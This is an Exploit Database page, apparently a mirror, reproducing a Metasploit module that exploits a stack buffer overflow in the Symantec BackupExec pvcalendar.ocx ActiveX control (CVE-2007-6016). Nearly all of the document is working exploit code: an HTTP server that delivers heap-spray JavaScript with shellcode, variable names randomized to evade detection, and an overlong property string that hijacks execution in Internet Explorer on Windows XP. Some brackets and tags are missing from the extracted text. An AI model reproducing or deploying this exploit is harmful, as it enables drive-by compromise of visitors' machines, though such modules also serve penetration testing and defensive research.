Symantec BackupExec Calendar Control – Remote Buffer Overflow (Metasploit)

Exploit Database
103 阅读

作者： Metasploit

日期： 2010-05-09
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/16582/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

# $Id: symantec_backupexec_pvcalendar.rb 9262 2010-05-09 17:45:00Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})

super(update_info(info,

'Name' => 'Symantec BackupExec Calendar Control Buffer Overflow',

'Description'=> %q{

This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.

By sending an overly long string to the "_DOWText0" property located

in the pvcalendar.ocx control, an attacker may be able to execute

arbitrary code.

'License'=> MSF_LICENSE,

'Author' => [ 'Elazar Broad <elazarb[at]earthlink.net>' ],

'Version'=> '$Revision: 9262 $',

'References' =>

[

[ 'CVE', '2007-6016' ],

[ 'OSVDB', '42358'],

[ 'BID', '26904' ],

[ 'URL', 'http://secunia.com/advisories/27885/' ],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload'=>

{

'Space' => 800,

'BadChars'=> "\x00\x09\x0a\x0d'\\",

'StackAdjustment' => -3500,

'Platform' => 'win',

'Targets'=>

[

[ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Offset' => 256, 'Ret' => 0x0A0A0A0A } ]

'DisclosureDate' => 'Feb 28 2008',

'DefaultTarget'=> 0))

end

def autofilter

false

end

def check_dependencies

use_zlib

end

def on_request_uri(cli, request)

# Re-generate the payload

return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode

shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Setup exploit buffers

nops = Rex::Text.to_unescape(make_nops(4))

ret = Rex::Text.uri_encode([target.ret].pack('L'))

blocksize = 0x30000

fillto= 400

offset = target['Offset']

junk = rand_text_alpha(4)

# Randomize the javascript variable names

pvcalendar = rand_text_alpha(rand(100) + 1)

j_shellcode= rand_text_alpha(rand(100) + 1)

j_nops = rand_text_alpha(rand(100) + 1)

j_headersize = rand_text_alpha(rand(100) + 1)

j_slackspace = rand_text_alpha(rand(100) + 1)

j_fillblock= rand_text_alpha(rand(100) + 1)

j_block= rand_text_alpha(rand(100) + 1)

j_memory = rand_text_alpha(rand(100) + 1)

j_counter= rand_text_alpha(rand(30) + 2)

j_ret= rand_text_alpha(rand(100) + 1)

j_junk = rand_text_alpha(rand(100) + 1)

j_filename = rand_text_alpha(rand(16) + 1)

# Build out the message

content = %Q|<html>

#{j_shellcode} = unescape('#{shellcode}');

#{j_nops} = unescape('#{nops}');

#{j_headersize} = 20;

#{j_slackspace} = #{j_headersize} + #{j_shellcode}.length

while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

#{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});

#{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});

while(#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};

#{j_memory} = new Array();

for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};

#{j_ret} = unescape('#{ret}');

while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret};

#{j_junk} = '#{junk}';

while (#{j_junk}.length < #{offset}) #{j_junk} += #{j_junk};

try {

#{pvcalendar}._DOWText0 = #{j_junk} + #{j_ret};

#{pvcalendar}.Save('#{j_filename}',0);

} catch(err) {}

</script>

</html>

print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client

send_response_html(cli, content)

# Handle the payload

handler(cli)

end